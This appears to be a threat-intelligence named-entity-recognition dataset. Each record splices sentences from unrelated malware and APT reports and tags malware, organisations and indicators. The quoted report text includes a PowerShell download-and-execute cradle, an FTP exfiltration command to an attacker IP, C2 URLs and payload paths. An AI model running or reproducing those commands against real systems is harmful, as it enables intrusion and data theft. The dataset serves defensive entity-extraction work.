Modules may be downloaded from a remote server or loaded from disk .", "spans": [{"start": 20, "end": 31, "label": "Organization"}, {"start": 43, "end": 50, "label": "Organization"}, {"start": 95, "end": 101, "label": "Malware"}, {"start": 123, "end": 136, "label": "Organization"}, {"start": 158, "end": 162, "label": "System"}, {"start": 214, "end": 222, "label": "Malware"}, {"start": 225, "end": 239, "label": "Malware"}, {"start": 330, "end": 398, "label": "Malware"}]} {"text": "More technically inclined people can detect infections by seeing if a device connects to a control server located at app.blinkingcamera.com . The most common communication mode for a RAT is to act as a client to a remote server . NetWeird ( Trojan.Netweird.B ) : A commodity Trojan which can open a backdoor and steal information from the compromised computer . PIEHOP utilizes LIGHTWORK to execute the IEC-104 commands \" ON \u201d or \" OFF \" on the remote system and immediately deletes the executable after issuing the commands .", "spans": [{"start": 117, "end": 139, "label": "Indicator"}, {"start": 183, "end": 186, "label": "System"}, {"start": 230, "end": 238, "label": "Malware"}, {"start": 241, "end": 258, "label": "Malware"}, {"start": 275, "end": 281, "label": "Malware"}, {"start": 362, "end": 368, "label": "System"}, {"start": 378, "end": 387, "label": "System"}]} {"text": "Package names for infected apps typically contain a common naming structure that includes com.XXXXXXXXX.camera , for example com.bird.sky.whale.camera ( app name : Whale Camera ) , com.color.rainbow.camera ( Rainbow Camera ) , and com.fishing.when.orangecamera ( Orange Camera ) . The Lazarus Group employs a variety of RATs and staging malware to conduct cyber operations , many of which contain significant code overlap that points to at least a shared development environment . It may also download additional potentially malicious files . 
The command and control ( C2 ) server must be configured from either the command line or a configuration file .", "spans": [{"start": 90, "end": 110, "label": "Indicator"}, {"start": 125, "end": 150, "label": "Indicator"}, {"start": 164, "end": 176, "label": "System"}, {"start": 181, "end": 205, "label": "Indicator"}, {"start": 208, "end": 222, "label": "System"}, {"start": 231, "end": 260, "label": "Indicator"}, {"start": 263, "end": 276, "label": "System"}, {"start": 285, "end": 298, "label": "Organization"}, {"start": 320, "end": 324, "label": "System"}, {"start": 329, "end": 344, "label": "System"}, {"start": 543, "end": 652, "label": "Malware"}]} {"text": "Google officials removed the malicious apps from the Play market after receiving a private report of their existence . While some members within the Romeo and Sierra groups may not implement sound authentication strategies , shift their design focus in abrupt and unusual manners , and fail to understand the pitfalls of distributed command networks , on the whole the families within the Lazarus Group 's collection of RATs and staging malware perform their tasks with surprising effectiveness . 
Elfin also makes frequent use of a number of publicly available hacking tools , including : Will Harrison was terminated as an Ashley Madison employee in November 2011 , and by early 2012 he \u2019d turned his considerable harassment skills squarely against the company .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 53, "end": 64, "label": "System"}, {"start": 149, "end": 154, "label": "Organization"}, {"start": 159, "end": 172, "label": "Organization"}, {"start": 389, "end": 402, "label": "Organization"}, {"start": 420, "end": 424, "label": "System"}, {"start": 429, "end": 444, "label": "System"}, {"start": 497, "end": 502, "label": "Organization"}, {"start": 589, "end": 602, "label": "Organization"}, {"start": 624, "end": 638, "label": "Organization"}]} {"text": "A company representative declined to comment for this post . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations . LaZagne ( SecurityRisk.LaZagne ) : A login/password retrieval tool . Talos provided a highly informative article on the PREDATOR commercial spyware , which has been around since 2019 .", "spans": [{"start": 105, "end": 112, "label": "Organization"}, {"start": 190, "end": 203, "label": "Organization"}, {"start": 215, "end": 238, "label": "Organization"}, {"start": 241, "end": 248, "label": "Malware"}, {"start": 251, "end": 271, "label": "Malware"}, {"start": 310, "end": 315, "label": "Organization"}, {"start": 361, "end": 369, "label": "Malware"}]} {"text": "BusyGasper \u2013 the unfriendly spy 29 AUG 2018 In early 2018 our mobile intruder-detection technology was triggered by a suspicious Android sample that , as it turned out , belonged to an unknown spyware family . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets financial organizations . 
Mimikatz ( Hacktool.Mimikatz ) : Tool designed to steal credentials . Although we have not identified sufficient evidence to determine the origin or purpose of COSMICENERGY , we believe that the malware was possibly developed by either Rostelecom - Solar or an associated party to recreate real attack scenarios against energy grid assets .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 129, "end": 136, "label": "System"}, {"start": 254, "end": 261, "label": "Organization"}, {"start": 339, "end": 362, "label": "Organization"}, {"start": 365, "end": 373, "label": "Malware"}, {"start": 376, "end": 393, "label": "Malware"}, {"start": 525, "end": 537, "label": "Malware"}, {"start": 601, "end": 619, "label": "Organization"}]} {"text": "Further investigation showed that the malware , which we named BusyGasper , is not all that sophisticated , but demonstrates some unusual features for this type of threat . McAfee Advanced Threat Research analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact . Gpppassword : Tool used to obtain and decrypt Group Policy Preferences ( GPP ) passwords . Data destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected .", "spans": [{"start": 63, "end": 73, "label": "Malware"}, {"start": 173, "end": 204, "label": "Organization"}, {"start": 300, "end": 316, "label": "Organization"}, {"start": 317, "end": 324, "label": "Organization"}, {"start": 335, "end": 356, "label": "System"}, {"start": 381, "end": 392, "label": "Malware"}, {"start": 472, "end": 488, "label": "Organization"}]} {"text": "From a technical point of view , the sample is a unique spy implant with stand-out features such as device sensors listeners , including motion detectors that have been implemented with a degree of originality . 
McAfee Advanced Threat Research ( ATR ) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact . SniffPass ( SniffPass ) : Tool designed to steal passwords by sniffing network traffic . The practical relationship between security , risk , and decision making is well articulated by the US Department of Homeland Security as it is described as an approach for making security decisions .", "spans": [{"start": 212, "end": 243, "label": "Organization"}, {"start": 246, "end": 249, "label": "Organization"}, {"start": 347, "end": 363, "label": "Organization"}, {"start": 364, "end": 371, "label": "Organization"}, {"start": 382, "end": 403, "label": "System"}, {"start": 428, "end": 437, "label": "Malware"}, {"start": 440, "end": 449, "label": "Malware"}, {"start": 613, "end": 651, "label": "Organization"}]} {"text": "It has an incredibly wide-ranging protocol \u2013 about 100 commands \u2013 and an ability to bypass the Doze battery saver . Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents . In this section , we describe in detail an Elfin attack on a U.S. organization . Phishing attacks are more nuanced as they hinge on human error and prey on victims who may be busy , distracted or caught in an especially wellcrafted attack .", "spans": [{"start": 140, "end": 153, "label": "Organization"}, {"start": 224, "end": 238, "label": "Organization"}, {"start": 320, "end": 325, "label": "Organization"}, {"start": 409, "end": 420, "label": "Vulnerability"}, {"start": 433, "end": 515, "label": "Organization"}]} {"text": "As a modern Android spyware it is also capable of exfiltrating data from messaging applications ( WhatsApp , Viber , Facebook ) . 
The use of decoy documents also reveals some of the potential targets of the Lazarus group 's malicious activity , specifically the use spear phishing attacks observed targeting South Korean government and aerospace organizations . On February 12 , 2018 at 16:45 ( all times are in the organization\u2019s local time ) , an email was sent to the organization advertising a job vacancy at an American global service provider . The collective \u2019s activity also supports domestic Russian promotion of support for the war .", "spans": [{"start": 98, "end": 106, "label": "System"}, {"start": 109, "end": 114, "label": "System"}, {"start": 117, "end": 125, "label": "System"}, {"start": 141, "end": 156, "label": "System"}, {"start": 207, "end": 220, "label": "Organization"}, {"start": 321, "end": 331, "label": "Organization"}, {"start": 336, "end": 359, "label": "Organization"}, {"start": 449, "end": 454, "label": "System"}]} {"text": "Moreover , BusyGasper boasts some keylogging tools \u2013 the malware processes every user tap , gathering its coordinates and calculating characters by matching given values with hardcoded ones . The campaign lasted from April to October and used job descriptions relevant to target organizations , in both English and Korean language . The email contained a malicious link to http://mynetwork.ddns.net:880 . 
UNC1878 has used various offensive security tools , most commonly Cobalt Strike BEACON , along with legitimate tools and built - in commands such as PSEXEC , WMI , and BITSadmin .", "spans": [{"start": 11, "end": 21, "label": "Malware"}, {"start": 337, "end": 342, "label": "System"}, {"start": 373, "end": 402, "label": "Indicator"}, {"start": 405, "end": 412, "label": "Organization"}, {"start": 471, "end": 491, "label": "System"}, {"start": 554, "end": 560, "label": "System"}, {"start": 563, "end": 566, "label": "System"}, {"start": 573, "end": 582, "label": "System"}]} {"text": "The sample has a multicomponent structure and can download a payload or updates from its C & C server , which happens to be an FTP server belonging to the free Russian web hosting service Ucoz . The Lazarus Group 's objective was to gain access to the target 's environment and obtain key military program insight or steal money . The recipient clicked the link and proceeded to download and open a malicious HTML executable file , which in turn loaded content from a C&C server via an embedded iframe . The malware also contains a new component called Tonnerre French for thunder a secondstage payload used for persistence , surveillance , and data exfiltration .", "spans": [{"start": 199, "end": 212, "label": "Organization"}, {"start": 508, "end": 515, "label": "Malware"}, {"start": 553, "end": 561, "label": "Malware"}, {"start": 583, "end": 602, "label": "Malware"}]} {"text": "It is noteworthy that BusyGasper supports the IRC protocol which is rarely seen among Android malware . In this latest discovery by McAfee , despite a short pause in similar operations , the Lazarus group targets financial organizations . At the same time , code embedded within this file also executed a powershell command to download and execute a copy of chfeeds.vbe from the C&C server . 
[System.Net.ServicePointManager] : :S erverCertificateValidationCallback={$true};IEX (New-Object Net.WebClient ) .DownloadString ( ' https://217.147.168.46:8088/index.jpg ' ) . Other big stories in June include a suspected LockBit affiliate arrest , the Royal ransomware gang toying with a new encryptor , and a notable increase in attacks on the Manufacturing sector .", "spans": [{"start": 22, "end": 32, "label": "Malware"}, {"start": 86, "end": 93, "label": "System"}, {"start": 132, "end": 138, "label": "Organization"}, {"start": 191, "end": 204, "label": "Organization"}, {"start": 213, "end": 236, "label": "Organization"}, {"start": 305, "end": 315, "label": "System"}, {"start": 358, "end": 369, "label": "Indicator"}, {"start": 379, "end": 389, "label": "System"}, {"start": 525, "end": 562, "label": "Indicator"}, {"start": 615, "end": 622, "label": "Organization"}, {"start": 646, "end": 667, "label": "Organization"}, {"start": 682, "end": 695, "label": "System"}, {"start": 739, "end": 759, "label": "Organization"}]} {"text": "In addition , the malware can log in to the attacker \u2019 s email inbox , parse emails in a special folder for commands and save any payloads to a device from email attachments . This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans . A second JavaScript command was also executed , which created a scheduled task to execute chfeeds.vbe multiple times a day . Mandiant has previously identified the domain wasxxv[.]site being used by North Korean threat actors .", "spans": [{"start": 205, "end": 216, "label": "Malware"}, {"start": 386, "end": 397, "label": "Indicator"}, {"start": 456, "end": 491, "label": "Indicator"}, {"start": 495, "end": 521, "label": "Organization"}]} {"text": "This particular operation has been active since approximately May 2016 up to the present time . 
This Malware Analysis Report ( MAR ) is the result of analytic efforts between the Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) . The chfeeds.vbe file acts as a downloader and was used to download a second powershell script ( registry.ps1 ) . They would then initiate communication with additional C2 infrastructure to execute obfuscated PowerShell scripts .", "spans": [{"start": 179, "end": 210, "label": "Organization"}, {"start": 213, "end": 216, "label": "Organization"}, {"start": 261, "end": 264, "label": "Organization"}, {"start": 273, "end": 284, "label": "Indicator"}, {"start": 345, "end": 355, "label": "System"}, {"start": 365, "end": 377, "label": "Indicator"}]} {"text": "Infection vector and victims While looking for the infection vector , we found no evidence of spear phishing or any of the other common vectors . When victims open malicious documents attached to the emails , the malware scans for Bitcoin activity and then establishes an implant for long-term data-gathering . This script in turn downloaded and executed a PowerShell backdoor known as POSHC2 , a proxy-aware C&C framework , from the C&C server ( https:// host-manager.hopto.org ) . But after being informed that Bradshaw was not subject to Canadian trademark laws , Avid Life offered to buy AshleyMadisonSucks.com for $ 10,000 .", "spans": [{"start": 357, "end": 376, "label": "Malware"}, {"start": 386, "end": 392, "label": "Malware"}, {"start": 397, "end": 422, "label": "System"}, {"start": 447, "end": 478, "label": "Indicator"}, {"start": 513, "end": 521, "label": "Organization"}, {"start": 567, "end": 576, "label": "Organization"}, {"start": 592, "end": 614, "label": "Organization"}]} {"text": "But some clues , such as the existence of a hidden menu for operator control , point to a manual installation method \u2013 the attackers used physical access to a victim \u2019 s device to install the malware . 
According to trusted third-party reporting , HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace , telecommunications , and finance industries . Later at 20:57 , the attackers became active on the compromised machine and proceeded to download the archiving tool WinRAR . 89.34.237.118 808 http://89.34.237.118:808/Rar32.exe . Based on the use of domain names they registered , the group started out in the business of fake / rogue anti - virus products in 2007 .", "spans": [{"start": 247, "end": 266, "label": "Organization"}, {"start": 290, "end": 307, "label": "System"}, {"start": 333, "end": 342, "label": "Organization"}, {"start": 345, "end": 363, "label": "Organization"}, {"start": 370, "end": 388, "label": "Organization"}, {"start": 508, "end": 514, "label": "System"}, {"start": 517, "end": 534, "label": "Indicator"}, {"start": 535, "end": 569, "label": "Indicator"}, {"start": 664, "end": 698, "label": "Malware"}]} {"text": "This would explain the number of victims \u2013 there are less than 10 of them and according to our detection statistics , they are all located in the Russia . The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control ( C2 ) server to a victim 's system via dual proxies . At 23:29 , the attackers then proceeded to deploy an updated version of their POSHC2 stager . 192.119.15.35 880 http://mynetwork.ddns.net:880/st-36-p4578.ps1 . 
The group 's long - standing center focus has been Ukraine , where it has carried out a campaign of disruptive and destructive attacks over the past decade using wiper malware , including during Russia 's re - invasion in 2022 .", "spans": [{"start": 189, "end": 192, "label": "System"}, {"start": 225, "end": 231, "label": "Organization"}, {"start": 402, "end": 408, "label": "Malware"}, {"start": 418, "end": 435, "label": "Indicator"}, {"start": 436, "end": 481, "label": "Indicator"}, {"start": 535, "end": 542, "label": "Organization"}, {"start": 572, "end": 594, "label": "Organization"}, {"start": 599, "end": 618, "label": "Organization"}, {"start": 646, "end": 659, "label": "Malware"}]} {"text": "Intrigued , we continued our search and found more interesting clues that could reveal some detailed information about the owners of the infected devices . FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors . This tool was downloaded several times between 23:29 on February 12 and 07:47 on February 13 . 
In October 2019 , ESET published \u201c Operation Ghost \u201d detailing a set of new trojans used by the Dukes , including PolyglotDuke , RegDuke and FatDuke .", "spans": [{"start": 156, "end": 165, "label": "System"}, {"start": 176, "end": 192, "label": "Malware"}, {"start": 220, "end": 240, "label": "System"}, {"start": 321, "end": 340, "label": "Organization"}, {"start": 456, "end": 460, "label": "Organization"}, {"start": 473, "end": 488, "label": "Organization"}, {"start": 534, "end": 539, "label": "Organization"}, {"start": 552, "end": 564, "label": "Malware"}, {"start": 567, "end": 574, "label": "Malware"}, {"start": 579, "end": 586, "label": "Malware"}]} {"text": "Several TXT files with commands on the attacker \u2019 s FTP server contain a victim identifier in the names that was probably added by the criminals : CMDS10114-Sun1.txt CMDS10134-Ju_ASUS.txt CMDS10134-Tad.txt CMDS10166-Jana.txt CMDS10187-Sun2.txt CMDS10194-SlavaAl.txt CMDS10209-Nikusha.txt Some of them sound like Russian names : Jana , SlavaAl , Nikusha . HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware to establish persistence . Two days later , on February 14 at 15:12 , the attackers returned and installed Quasar RAT onto the infected computer that communicated with a C&C server ( 217.147.168.123 ) . 
Have you ever been targeted by a social engineering attack Was it through email or", "spans": [{"start": 147, "end": 165, "label": "Indicator"}, {"start": 166, "end": 187, "label": "Indicator"}, {"start": 188, "end": 205, "label": "Indicator"}, {"start": 206, "end": 224, "label": "Indicator"}, {"start": 225, "end": 243, "label": "Indicator"}, {"start": 244, "end": 265, "label": "Indicator"}, {"start": 266, "end": 287, "label": "Indicator"}, {"start": 355, "end": 374, "label": "Organization"}, {"start": 382, "end": 395, "label": "System"}, {"start": 399, "end": 406, "label": "System"}, {"start": 422, "end": 439, "label": "System"}, {"start": 547, "end": 557, "label": "Malware"}, {"start": 623, "end": 638, "label": "Indicator"}]} {"text": "As we know from the FTP dump analysis , there was a firmware component from ASUS firmware , indicating the attacker \u2019 s interest in ASUS devices , which explains the victim file name that mentions \u201c ASUS \u201d . HIDDEN COBRA actors install the FALLCHILL malware to establish persistence . Quasar RAT was installed to CSIDL_PROFILE\\appdata\\roaming\\microsoft\\crypto\\smss.exe . Sometimes this was a high profile , legitimate site such as \u2018 diplomacy.pl \u2019 hosting a ZIP archive .", "spans": [{"start": 76, "end": 80, "label": "Organization"}, {"start": 132, "end": 136, "label": "Organization"}, {"start": 208, "end": 227, "label": "Organization"}, {"start": 240, "end": 257, "label": "System"}, {"start": 285, "end": 295, "label": "Malware"}, {"start": 313, "end": 368, "label": "Indicator"}, {"start": 392, "end": 469, "label": "Indicator"}]} {"text": "Information gathered from the email account provides a lot of the victims \u2019 personal data , including messages from IM applications . Working with U.S. 
government partners , DHS and FBI identified Internet Protocol ( IP ) addresses and other indicators of compromise ( IOCs ) associated with a remote administration tool ( RAT ) used by the North Korean government\u2014commonly known as FALLCHILL . At this point , the attackers ceased activity while maintaining access to the network until February 21 . We have observed CADDYWIPER deployed across several verticals in Ukraine , including the government and financial sectors , throughout Russia \u2019s invasion of Ukraine .", "spans": [{"start": 152, "end": 162, "label": "Organization"}, {"start": 174, "end": 177, "label": "Organization"}, {"start": 182, "end": 185, "label": "Organization"}, {"start": 294, "end": 320, "label": "System"}, {"start": 323, "end": 326, "label": "System"}, {"start": 383, "end": 392, "label": "System"}, {"start": 518, "end": 528, "label": "System"}, {"start": 590, "end": 600, "label": "Organization"}, {"start": 605, "end": 622, "label": "Organization"}, {"start": 636, "end": 667, "label": "Organization"}]} {"text": "Gathered file Type Description lock Text Implant log ldata sqlite3 Location data based on network ( cell_id ) gdata sqlite3 Location data based on GPS coordinates sdata sqlite3 SMS messages f.db sqlite3 Facebook messages v.db sqlite3 Viber messages w.db sqlite3 WhatsApp messages Among the other data gathered were SMS banking messages that revealed an account with a balance of more than US $ 10,000.But as far as we know , the attacker behind this campaign is not interested in stealing the victims \u2019 money This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL . At 06:38 , the attackers were observed downloading a custom .NET FTP tool to the infected computer . 192.119.15.36 880 http://192.119.15.36:880/ftp.exe . Cybersecurity researchers recently uncovered a phishing campaign , dubbed BadBlood , aimed at 25 senior professionals specializing in genetic , neurology , and oncology research in the U.S. 
and Israel .", "spans": [{"start": 163, "end": 176, "label": "Indicator"}, {"start": 190, "end": 202, "label": "Indicator"}, {"start": 203, "end": 211, "label": "System"}, {"start": 221, "end": 233, "label": "Indicator"}, {"start": 234, "end": 239, "label": "System"}, {"start": 249, "end": 261, "label": "Indicator"}, {"start": 262, "end": 270, "label": "System"}, {"start": 523, "end": 532, "label": "Malware"}, {"start": 541, "end": 553, "label": "Organization"}, {"start": 576, "end": 585, "label": "System"}, {"start": 648, "end": 656, "label": "Malware"}, {"start": 689, "end": 706, "label": "Indicator"}, {"start": 707, "end": 739, "label": "Indicator"}, {"start": 742, "end": 767, "label": "Organization"}, {"start": 789, "end": 806, "label": "Organization"}, {"start": 816, "end": 824, "label": "Organization"}, {"start": 836, "end": 919, "label": "Organization"}]} {"text": ". McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure , entertainment , finance , health care , and telecommunications . Later at 6:56 , the attackers exfiltrated data using this FTP tool to a remote host: JsuObf.exe Nup#Tntcommand -s CSIDL_PROFILE\\appdata\\roaming\\adobe\\rar -a ftp://89.34.237.118:2020 -f/[REDACTED]-u[REDACTED]-p[REDACTED] . Between Jan. 
1 \u2013 June 20 , 2023 , Mandiant identified more than 500 distinct victims that the KillNet collective has allegedly targeted with DDoS attacks .", "spans": [{"start": 2, "end": 33, "label": "Organization"}, {"start": 145, "end": 168, "label": "Organization"}, {"start": 171, "end": 184, "label": "Organization"}, {"start": 187, "end": 194, "label": "Organization"}, {"start": 197, "end": 208, "label": "Organization"}, {"start": 215, "end": 233, "label": "Organization"}, {"start": 294, "end": 297, "label": "System"}, {"start": 321, "end": 331, "label": "Indicator"}, {"start": 512, "end": 613, "label": "Indicator"}]} {"text": "We found no similarities to commercial spyware products or to other known spyware variants , which suggests BusyGasper is self-developed and used by a single threat actor . Because of this , additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL . Activity ceased until the attackers returned on March 5 and were observed using Quasar RAT to download a second custom AutoIt FTP Exfiltration tool known as FastUploader from http://192.119.15.36:880/ftp.exe . Techniques include reading SAM and LSA secrets from registries , dumping NTLM hashes , plaintext credentials , and Kerberos keys , as well as dumping the NTDS.dit Active Directory database .", "spans": [{"start": 108, "end": 118, "label": "Malware"}, {"start": 202, "end": 222, "label": "System"}, {"start": 266, "end": 275, "label": "System"}, {"start": 358, "end": 368, "label": "Malware"}, {"start": 397, "end": 407, "label": "Malware"}, {"start": 435, "end": 447, "label": "Malware"}, {"start": 453, "end": 485, "label": "Indicator"}]} {"text": "At the same time , the lack of encryption , use of a public FTP server and the low opsec level could indicate that less skilled attackers are behind the malware . 
This campaign , dubbed Operation GhostSecret , leverages multiple implants , tools , and malware variants associated with the state-sponsored cyber group HIDDEN COBRA . This tool was then installed to csidl_profile\\appdata\\roaming\\adobe\\ftp.exe . Adversaries may manipulate physical process control within the industrial environment .", "spans": [{"start": 305, "end": 316, "label": "Organization"}, {"start": 317, "end": 329, "label": "Organization"}, {"start": 364, "end": 407, "label": "Indicator"}]} {"text": "Technical details Here is the meta information for the observed samples , certificates and hardcoded version stamps : Certificate MD5 Module Version Serial Number : 0x76607c02 Issuer : CN=Ron Validity : from = Tue Aug 30 13:01:30 MSK 2016 to = Sat Aug 24 13:01:30 MSK 2041 Subject : CN=Ron 9e005144ea1a583531f86663a5f14607 1 \u2013 18abe28730c53de6d9e4786c7765c3d8 2 2.0 From March 18 to 26 we observed the malware operating in multiple areas of the world . FastUploader is a custom FTP tool designed to exfiltrate data at a faster rate than traditional FTP clients . 
When CrowdStrike researchers later reproduced the attack , events were present in CozyDuke - also known as CozyBear , CozyCar and Office Monkeys ( among others ) , and whose activity appears to align with advanced persistent threat APT29 - is a threat actor which came to prominence in 2014 when it is believed to have staged a series of precise attacks on high profile targets including the US White House , Department of State and the Democratic National Committee .", "spans": [{"start": 165, "end": 175, "label": "Indicator"}, {"start": 290, "end": 322, "label": "Indicator"}, {"start": 327, "end": 359, "label": "Indicator"}, {"start": 453, "end": 465, "label": "Malware"}, {"start": 478, "end": 481, "label": "System"}, {"start": 549, "end": 552, "label": "System"}, {"start": 568, "end": 591, "label": "Organization"}, {"start": 645, "end": 653, "label": "Malware"}, {"start": 670, "end": 678, "label": "Malware"}, {"start": 681, "end": 688, "label": "Malware"}, {"start": 693, "end": 707, "label": "Malware"}, {"start": 795, "end": 800, "label": "Organization"}, {"start": 955, "end": 969, "label": "Organization"}, {"start": 972, "end": 991, "label": "Organization"}, {"start": 1000, "end": 1029, "label": "Organization"}]} {"text": "Serial Number : 0x6a0d1fec Issuer : CN=Sun Validity : from = Mon May 16 17:42:40 MSK 2016 to = Fri May 10 17:42:40 MSK 2041 Subject : CN=Sun 9ffc350ef94ef840728564846f2802b0 2 v2.51sun 6c246bbb40b7c6e75c60a55c0da9e2f2 2 v2.96s 7c8a12e56e3e03938788b26b84b80bd6 2 v3.09s Furthermore , the Advanced Threat Research team has discovered Proxysvc , which appears to be an undocumented implant . At this point , additional activity from the attackers continued between March 5 into April , and on April 18 at 11:50 , a second remote access tool known as DarkComet was deployed to csidl_profile\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\smss.exe on the infected computer . 
In its spear phish , CloudLook also used a self - extracting archive containing a PDF file that lured its victims with information regarding world terrorism .", "spans": [{"start": 16, "end": 26, "label": "Indicator"}, {"start": 141, "end": 173, "label": "Indicator"}, {"start": 185, "end": 217, "label": "Indicator"}, {"start": 227, "end": 259, "label": "Indicator"}, {"start": 287, "end": 311, "label": "Organization"}, {"start": 332, "end": 340, "label": "System"}, {"start": 547, "end": 556, "label": "Malware"}, {"start": 627, "end": 657, "label": "Indicator"}, {"start": 706, "end": 715, "label": "Malware"}]} {"text": "bde7847487125084f9e03f2b6b05adc3 2 v3.12s 2560942bb50ee6e6f55afc495d238a12 2 v3.18s It \u2019 s interesting that the issuer \u201c Sun \u201d matches the \u201c Sun1 \u201d and \u201c Sun2 \u201d identifiers of infected devices from the FTP server , suggesting they may be test devices . Our investigation into this campaign reveals that the actor used multiple malware implants , including an unknown implant with capabilities similar to Bankshot . This was quickly followed 15 seconds later by the installation of a credential dumping to csidl_profile\\appdata\\roaming\\microsoft\\credentials\\dwm32.exe , and the execution of powershell commands via PowerShell Empire , a freely available post-exploitation framework , to bypass logging on the infected machine . A clever example was \u2018 Office Monkeys LOL Video.zip \u2019 .", "spans": [{"start": 0, "end": 32, "label": "Indicator"}, {"start": 42, "end": 74, "label": "Indicator"}, {"start": 307, "end": 312, "label": "Organization"}, {"start": 404, "end": 412, "label": "System"}, {"start": 505, "end": 566, "label": "Indicator"}, {"start": 590, "end": 600, "label": "System"}, {"start": 614, "end": 631, "label": "System"}, {"start": 750, "end": 778, "label": "Indicator"}]} {"text": "The analyzed implant has a complex structure , and for now we have observed two modules . 
The attackers behind Operation GhostSecret used a similar infrastructure to earlier threats , including SSL certificates used by FakeTLS in implants found in the Destover backdoor variant known as Escad , which was used in the Sony Pictures attack . Activity continued throughout April where additional versions of DarkComet , POSHC2 implants , and an AutoIt backdoor were deployed along with further credential dumping activities . Cisco Secure Endpoint ( formerly AMP for Endpoints ) is ideally suited to prevent the execution of the malware detailed in this post .", "spans": [{"start": 94, "end": 103, "label": "Organization"}, {"start": 194, "end": 210, "label": "System"}, {"start": 219, "end": 226, "label": "System"}, {"start": 252, "end": 269, "label": "System"}, {"start": 287, "end": 292, "label": "System"}, {"start": 405, "end": 414, "label": "Malware"}, {"start": 417, "end": 423, "label": "Malware"}, {"start": 442, "end": 457, "label": "Malware"}, {"start": 523, "end": 573, "label": "System"}]} {"text": "First ( start ) module The first module , which was installed on the targeted device , could be controlled over the IRC protocol and enable deployment of other components by downloading a payload from the FTP server : @ install command As can be seen from the screenshot above , a new component was copied in the system path , though that sort of operation is impossible without root privileges . Based on our analysis of public and private information from submissions , along with product telemetry , it appears Proxysvc was used alongside the 2017 Destover variant and has operated undetected since mid-2017 . Elfin is one of the most active groups currently operating in the Middle East , targeting a large number of organizations across a diverse range of sectors . 
The malware is designed to cause electric power disruption by interacting with IEC 60870 - 5 - 104 ( IEC-104 ) devices , such as remote terminal units ( RTUs ) , that are commonly leveraged in electric transmission and distribution operations in Europe , the Middle East , and Asia .", "spans": [{"start": 514, "end": 522, "label": "System"}, {"start": 551, "end": 559, "label": "System"}, {"start": 613, "end": 618, "label": "Organization"}]} {"text": "At the time of writing we had no evidence of an exploit being used to obtain root privileges , though it is possible that the attackers used some unseen component to implement this feature . This new variant resembles parts of the Destover malware , which was used in the 2014 Sony Pictures attack . Over the past three years , the group has utilized a wide array of tools against its victims , ranging from custom built malware to off-the-shelf RATs , indicating a willingness to continually revise its tactics and find whatever tools it takes to compromise its next set of victims . 
Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": [{"start": 231, "end": 247, "label": "System"}, {"start": 708, "end": 713, "label": "Organization"}, {"start": 779, "end": 789, "label": "Organization"}]} {"text": "Here is a full list of possible commands that can be executed by the first module : Command name Description @ stop Stop IRC @ quit System.exit ( 0 ) @ start Start IRC @ server Set IRC server ( default value is \u201c irc.freenode.net \u201d ) , port is always 6667 @ boss Set IRC command and control nickname ( default value is \u201c ISeency \u201d ) @ nick Set IRC client nickname @ screen Report every time when screen is on ( enable/disable ) @ root Use root features ( enable/disable ) @ timer Set The Lazarus used a similar infrastructure to earlier threats , including the Destover backdoor variant known as Escad . Symantec has the following protection in place to protect customers against these attacks , APT33 : Backdoor.Notestuk Trojan.Stonedrill Backdoor.Remvio Backdoor.Breut Trojan.Quasar Backdoor.Patpoopy Trojan.Nancrat Trojan.Netweird.B Exp.CVE-2018-20250 SecurityRisk.LaZagne Hacktool.Mimikatz SniffPass . 
Some cyber criminal groups use their hacking skills to go after large organizations .", "spans": [{"start": 132, "end": 149, "label": "Indicator"}, {"start": 213, "end": 229, "label": "Indicator"}, {"start": 488, "end": 495, "label": "Organization"}, {"start": 561, "end": 578, "label": "System"}, {"start": 596, "end": 601, "label": "System"}, {"start": 696, "end": 701, "label": "Organization"}, {"start": 704, "end": 721, "label": "Malware"}, {"start": 722, "end": 739, "label": "Malware"}, {"start": 740, "end": 755, "label": "Malware"}, {"start": 756, "end": 770, "label": "Malware"}, {"start": 771, "end": 784, "label": "Malware"}, {"start": 785, "end": 802, "label": "Malware"}, {"start": 803, "end": 817, "label": "Malware"}, {"start": 818, "end": 835, "label": "Malware"}, {"start": 836, "end": 854, "label": "Vulnerability"}, {"start": 855, "end": 875, "label": "Malware"}, {"start": 876, "end": 893, "label": "Malware"}, {"start": 894, "end": 903, "label": "Malware"}, {"start": 911, "end": 932, "label": "Organization"}, {"start": 970, "end": 989, "label": "Organization"}]} {"text": "period of IRCService start @ hide Hide implant icon @ unhide Unhide implant icon @ run Execute specified shell @ broadcast Send command to the second module @ echo Write specified message to log @ install Download and copy specified component to the system path The implant uses a complex intent-based communication mechanism between its components to broadcast commands : Approximate graph of relationships between BusyGasper components Second ( main ) module This module writes a log of the command execution history to the file named \u201c lock \u201d , which is later exfiltrated The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 . APT33 : 5798aefb07e12a942672a60c2be101dc26b01485616713e8be1f68b321747f2f S-SHA2 Notestuk/TURNEDUP . 
